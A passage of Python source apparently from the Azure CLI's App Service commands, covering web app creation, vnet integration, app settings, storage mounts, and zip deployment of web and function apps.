        raise ResourceNotFoundError("The plan '{}' doesn't exist in the resource group '{}".format(plan,
                                                                                                   resource_group_name))
    is_linux = plan_info.reserved
    helper = _StackRuntimeHelper(cmd, linux=is_linux, windows=not is_linux)
    location = plan_info.location
    # This is to keep the existing appsettings for a newly created webapp on existing webapp name.
    name_validation = get_site_availability(cmd, name)
    if not name_validation.name_available:
        if name_validation.reason == 'Invalid':
            raise ValidationError(name_validation.message)
        logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise ResourceNotFoundError("Unable to retrieve details of the existing app '{}'. Please check that "
                                        "the app is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise ValidationError("The webapp '{}' exists in resource group '{}' and does not "
                                  "match the value entered '{}'. Please re-run command with the "
                                  "correct parameters.". format(name, current_rg, resource_group_name))
        # Carry over the existing app's settings so re-creation is non-destructive.
        existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
                                                        name, 'list_application_settings')
        settings = []
        for k, v in existing_app_settings.properties.items():
            settings.append(NameValuePair(name=k, value=v))
        site_config = SiteConfig(app_settings=settings)
    else:
        site_config = SiteConfig(app_settings=[])
    # always_on is unsupported on free/shared/basic tiers, so only set it above them.
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True

    if subnet or vnet:
        subnet_info = _get_subnet_info(cmd=cmd,
                                       resource_group_name=resource_group_name,
                                       subnet=subnet,
                                       vnet=vnet)
        _validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
                                            subnet_resource_group=subnet_info["resource_group_name"],
                                            vnet_name=subnet_info["vnet_name"],
                                            vnet_sub_id=subnet_info["subnet_subscription_id"])
        _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
                               vnet_resource_group=subnet_info["resource_group_name"],
                               vnet_name=subnet_info["vnet_name"],
                               subnet_name=subnet_info["subnet_name"])
        site_config.vnet_route_all_enabled = True
        subnet_resource_id = subnet_info["subnet_resource_id"]
    else:
        subnet_resource_id = None

    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
    if runtime:
        runtime = helper.remove_delimiters(runtime)

    current_stack = None
    if is_linux:
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise ArgumentUsageError("usage error: --runtime | --deployment-container-image-name |"
                                     " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file

        if runtime:
            match = helper.resolve(runtime, is_linux)
            if not match:
                raise ValidationError("Linux Runtime '{}' is not supported."
                                      " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                              value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)

    elif plan_info.is_xenon:  # windows container webapp
        if deployment_container_image_name:
            site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
        # set the needed app settings for container image validation
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
                                                          value=docker_registry_server_user))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
                                                          value=docker_registry_server_password))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
                                                          value=docker_registry_server_url))

    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise ArgumentUsageError("usage error: --startup-file or --deployment-container-image-name or "
                                     "--multicontainer-config-type and --multicontainer-config-file is "
                                     "only appliable on linux webapp")
        match = helper.resolve(runtime, linux=is_linux)
        if not match:
            raise ValidationError("Windows runtime '{}' is not supported. "
                                  "Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        helper.get_site_config_setter(match, linux=is_linux)(cmd=cmd, stack=match, site_config=site_config)

        # TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
        # portal uses the current_stack propety in metadata to display stack for windows apps
        current_stack = get_current_stack_from_runtime(runtime)

    else:  # windows webapp without runtime specified
        if name_validation.name_available:  # If creating new webapp
            node_default_version = helper.get_default_version("node", is_linux, get_windows_config_version=True)
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))

    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)

    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        if name_validation.name_available:
            logger.info("will set appsetting for enabling build")
            site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                          value='https://{}.scm.azurewebsites.net/detectors'
                                                          .format(name)))

    poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)

    # TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
    if current_stack:
        _update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)

    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)

    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)

    if deployment_container_image_name:
        logger.info("Updating container settings")
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)

    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        webapp.identity = identity
    return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location, vnet_sub_id=None):
    """Raise ArgumentUsageError unless the vnet is in the same (normalized)
    location as the App Service plan / webapp.

    When the vnet lives in another subscription (vnet_sub_id), the CLI
    context's subscription is temporarily switched so the network client
    resolves the vnet there.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id

    current_sub_id = get_subscription_id(cmd.cli_ctx)
    try:
        if vnet_sub_id:
            cmd.cli_ctx.data['subscription_id'] = vnet_sub_id
        vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
        vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
                                        virtual_network_name=vnet_name).location
    finally:
        # BUG FIX: the original restored the subscription only on the success
        # path; if the vnet GET raised, later calls in this CLI invocation
        # would silently target the vnet's subscription. Always restore.
        cmd.cli_ctx.data['subscription_id'] = current_sub_id

    vnet_location = _normalize_location(cmd, vnet_location)
    asp_location = _normalize_location(cmd, webapp_location)

    if vnet_location != asp_location:
        raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
                                 "vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
    """Resolve --vnet/--subnet arguments into a dict of subnet/vnet identifiers.

    Both arguments may be full resource IDs or plain names. Returns a dict
    with keys: vnet_name, subnet_name, resource_group_name,
    subnet_resource_id, subnet_subscription_id, vnet_resource_id.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    vnet_id_template = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"

    # Case 1: --subnet is a full resource ID; everything is parsed from it.
    if is_valid_resource_id(subnet):
        if vnet:
            logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
        parsed = parse_resource_id(subnet)
        return {
            "vnet_name": parsed["name"],
            "subnet_name": parsed["resource_name"],
            "resource_group_name": parsed["resource_group"],
            "subnet_resource_id": subnet,
            "subnet_subscription_id": parsed["subscription"],
            "vnet_resource_id": vnet_id_template.format(parsed["subscription"],
                                                        parsed["resource_group"],
                                                        parsed["name"]),
        }

    # Case 2: --subnet is a bare name; the vnet argument determines the rest.
    if is_valid_resource_id(vnet):
        parsed_vnet = parse_resource_id(vnet)
        subnet_rg = parsed_vnet["resource_group"]
        vnet_name = parsed_vnet["name"]
        subscription_id = parsed_vnet["subscription"]
        vnet_resource_id = vnet
    else:
        logger.warning("Assuming subnet resource group is the same as webapp. "
                       "Use a resource ID for --subnet or --vnet to use a different resource group.")
        subnet_rg = resource_group_name
        vnet_name = vnet
        subscription_id = get_subscription_id(cmd.cli_ctx)
        vnet_resource_id = vnet_id_template.format(subscription_id, subnet_rg, vnet)

    subnet_resource_id = "{}/subnets/{}".format(
        vnet_id_template.format(subscription_id, subnet_rg, vnet_name), subnet)
    return {
        "vnet_name": vnet_name,
        "subnet_name": subnet,
        "resource_group_name": subnet_rg,
        "subnet_resource_id": subnet_resource_id,
        "subnet_subscription_id": subscription_id,
        "vnet_resource_id": vnet_resource_id,
    }
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one container-app source option is supplied.

    The multicontainer config type and file must be given together; beyond
    that, exactly one of runtime, container image, or multicontainer config
    may be chosen.
    """
    # The two multicontainer flags form a pair: one without the other is invalid.
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    provided = sum(1 for option in (runtime, deployment_container_image_name, multicontainer_config_type) if option)
    return provided == 1
def parse_docker_image_name(deployment_container_image_name):
    """Best-effort extraction of the registry server URL from a container image name.

    Returns None for Docker Hub style names (no registry host detectable),
    the bare hostname when the name already carries a URL scheme, or an
    https:// URL built from the registry host otherwise.
    """
    if not deployment_container_image_name:
        return None
    # A registry host is only assumed when the name contains a '/' AND a '.'
    # or ':' appears somewhere (e.g. myregistry.azurecr.io/image:tag).
    looks_like_hub_image = ("/" not in deployment_container_image_name or
                            ("." not in deployment_container_image_name and
                             ":" not in deployment_container_image_name))
    if looks_like_hub_image:
        return None
    parsed = urlparse(deployment_container_image_name)
    if parsed.scheme:
        return parsed.hostname
    registry_host = urlparse("https://{}".format(deployment_container_image_name)).hostname
    return "https://{}".format(registry_host)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Create or update application settings on a site (or slot).

    Entries in ``settings``/``slot_settings`` are either ``KEY=VALUE`` strings
    or JSON (in particular the output of the 'list' command: a list of objects
    with name/value and an optional slotSetting flag). Settings supplied via
    ``slot_settings`` are additionally marked slot-sticky. Returns the
    combined app-settings output including sticky names.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    # current settings stored on the site/slot
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
        for s in src:
            try:
                # try JSON input first (single object or the list-command output)
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        if 'slotSetting' in t.keys():
                            slot_result[t['name']] = t['slotSetting']
                        # values passed through --slot-settings are always sticky
                        if setting_type == "SlotSettings":
                            slot_result[t['name']] = True
                        result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # not JSON: plain KEY=VALUE (split only on the first '=')
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value
    # NOTE(review): after the loop 'dest' is still bound to slot_result, so this
    # merges the slot settings' values into the combined result — confirm intended.
    result.update(dest)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings, slot, client)
    app_settings_slot_cfg_names = []
    if slot_result:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        # Slot settings logic to add a new setting(s) or remove an existing setting(s)
        for slot_setting_name, value in slot_result.items():
            if value and slot_setting_name not in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.append(slot_setting_name)
            elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
                slot_cfg_names.app_setting_names.remove(slot_setting_name)
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage mount to a webapp.

    Fails when a configuration with the same custom_id already exists;
    optionally marks the configuration name as slot-sticky.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))
    new_mount = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                      share_name=share_name, access_key=access_key,
                                      mount_path=mount_path)
    azure_storage_accounts.properties[custom_id] = new_mount
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts,
                                         slot, client)
    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        sticky_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in sticky_names:
            sticky_names.append(custom_id)
        slot_cfg_names.azure_storage_config_names = sticky_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing Azure storage mount; unspecified fields keep their current values."""
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    existing = azure_storage_accounts.properties.pop(custom_id, None)
    if not existing:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))
    # Fall back to the existing value for any field the caller did not supply.
    azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(
        type=storage_type or existing.type,
        account_name=account_name or existing.account_name,
        share_name=share_name or existing.share_name,
        access_key=access_key or existing.access_key,
        mount_path=mount_path or existing.mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts,
                                         slot, client)
    if slot_setting:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        sticky_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in sticky_names:
            sticky_names.append(custom_id)
        slot_cfg_names.azure_storage_config_names = sticky_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy a function app.

    Linux (reserved) Consumption apps without remote build are deployed via
    storage upload (run-from-package); otherwise Linux apps get their remote
    build app settings toggled before the regular kudu zip deployment.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10  # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for retry in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        if retry < 4:  # no point sleeping after the final attempt
            time.sleep(retry_delay)
    if plan_info is None:
        # Fix: previously a still-missing plan crashed in is_plan_consumption
        # with an unhelpful error; fail with a clear message instead.
        raise CLIError('Could not determine the App Service Plan of function app \'{}\'. '
                       'Please try again later.'.format(name))
    is_consumption = is_plan_consumption(cmd, plan_info)
    # app.reserved == True indicates a Linux app
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote and app.reserved:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    elif app.reserved:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy a web app: thin wrapper over enable_zip_deploy."""
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Push a local zip file to the app's kudu (SCM) zipdeploy endpoint.

    Deploys asynchronously: a 202 response is followed up by polling the
    latest-deployment status URL (honoring ``timeout``). A 409 means another
    deployment is in flight or WEBSITE_RUN_FROM_PACKAGE is set; any other
    non-200 status is surfaced as an internal error.
    """
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'
    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()
    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
    logger.warning("Starting zip deployment. This operation can take a while to complete ...")
    res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
    logger.warning("Deployment endpoint responded with status code %d", res.status_code)
    # check the status of async deployment
    if res.status_code == 202:
        response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                                authorization, timeout)
        return response
    # check if there's an ongoing process
    if res.status_code == 409:
        raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
                                    "WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
                                    "WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
                                    "appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
                                    "MySubscription' to list app settings and 'az webapp config appsettings delete "
                                    "--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
                                    "to delete them.".format(deployment_status_url))
    # Fix: the original 'if res.status_code:' raised for ANY status, including a
    # successful synchronous 200. Only treat non-200 responses as errors.
    if res.status_code != 200:
        raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
                                 .format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Ensure the app settings required for a remote (Oryx) build are in place.

    Sets SCM_DO_BUILD_DURING_DEPLOYMENT=true and removes
    WEBSITE_RUN_FROM_PACKAGE / ENABLE_ORYX_BUILD if present, then waits for the
    SCM site to pick up the changes before deployment proceeds.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None
    app_settings_should_not_have = []
    app_settings_should_contain = {}
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value
    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
    # Wait for scm site to get the latest app settings
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        # Fix: the original slept 5s even after validation succeeded, and its
        # retry counter went negative on a last-attempt success, firing the
        # "may not be propagated" warning spuriously.
        for _ in range(11):  # same budget as the original retries=10..0 loop
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            if scm_is_up_to_date:
                break
            time.sleep(5)
        if not scm_is_up_to_date:
            logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Disable remote build: set SCM_DO_BUILD_DURING_DEPLOYMENT=false.

    Waits for the SCM site to reflect the new value before deployment proceeds.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    app_settings_should_contain = {}
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
    if scm_do_build_during_deployment is not False:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
    # Wait for scm site to get the latest app settings
    if app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        # Fix: avoid the unconditional 5s sleep after a successful check and the
        # spurious warning when the final retry succeeded (counter went negative).
        for _ in range(11):  # same budget as the original retries=10..0 loop
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain)
            if scm_is_up_to_date:
                break
            time.sleep(5)
        if not scm_is_up_to_date:
            logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Upload a zip to the app's AzureWebJobsStorage account and run from package.

    The blob gets a long-lived read SAS (520 weeks), WEBSITE_RUN_FROM_PACKAGE
    is pointed at it, and function triggers are synced afterwards.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])
    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
    container_name = "function-releases"
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)

    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        total_length = 30
        # Fix: round the scaled ratio, not just the numerator — the original
        # int(round(total_length * current) / float(total)) rounded an integer
        # product (a no-op) and then truncated, skewing the bar width.
        filled_length = int(round(total_length * current / float(total)))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)

    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)
    now = datetime.datetime.utcnow()
    blob_start = now - datetime.timedelta(minutes=10)  # allow for clock skew
    blob_end = now + datetime.timedelta(weeks=520)
    BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)
    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)
    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ex:
        # This SDK function throws an error if Status Code is 200
        if ex.status_code != 200:
            raise ex
    except Exception as ex:  # pylint: disable=broad-except
        # Fix: guard against exceptions without a .response attribute, which
        # previously produced an AttributeError inside the handler.
        response = getattr(ex, 'response', None)
        if response is None or response.status_code != 200:
            raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
    """Show a web app's details; errors if the site exists but is not a webapp."""
    return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Getter used by the generic 'update' machinery: fetch the raw site object."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,  # pylint: disable=unused-argument
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):  # pylint: disable=unused-argument
    """Setter used by the generic 'update' machinery: PUT the modified site back.

    The patched site object arrives in kwargs['parameters']; slot deployments
    go through the *_slot variant of the create-or-update operation.
    """
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    call_args = {'resource_group_name': resource_group_name, 'name': name, 'site_envelope': instance}
    if slot:
        call_args['slot'] = slot
        return client.web_apps.begin_create_or_update_slot(**call_args)
    return client.web_apps.begin_create_or_update(**call_args)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
                  prewarmed_instance_count=None):
    """Generic-update hook for 'az webapp update': patch the in-memory site object.

    Elastic-instance arguments are validated against the app's plan (must be
    Premium V2/V3 with elastic scale enabled, and within the plan's maximum
    elastic worker count). Returns the modified instance for the PUT.
    """
    if 'function' in instance.kind:
        raise ValidationError("please use 'az functionapp update' to update this function app")
    if minimum_elastic_instance_count or prewarmed_instance_count:
        # NOTE(review): a value of 0 is falsy and skips this validation block,
        # yet is still applied below — confirm that is intended.
        args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
        plan = get_app_service_plan_from_webapp(cmd, instance, api_version="2021-01-15")
        sku = _normalize_sku(plan.sku.name)
        if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
            raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
        if not plan.elastic_scale_enabled:
            raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
        if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
            raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
                                  "the app service plan's maximum Elastic worker count. "
                                  "Please choose a lower count or update the plan's maximum ")
        if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
            raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
                                  "the app service plan's maximum Elastic worker count. "
                                  "Please choose a lower count or update the plan's maximum ")
    # CLI passes booleans through as the strings 'true'/'false'
    if client_affinity_enabled is not None:
        instance.client_affinity_enabled = client_affinity_enabled == 'true'
    if https_only is not None:
        instance.https_only = https_only == 'true'
    if minimum_elastic_instance_count is not None:
        from azure.mgmt.web.models import SiteConfig
        # Need to create a new SiteConfig object to ensure that the new property is included in request body
        conf = SiteConfig(**instance.site_config.as_dict())
        conf.minimum_elastic_instance_count = minimum_elastic_instance_count
        instance.site_config = conf
    if prewarmed_instance_count is not None:
        instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
    return instance
def update_functionapp(cmd, instance, plan=None, force=False):
    """Generic-update hook for 'az functionapp update': optionally move the app to another plan."""
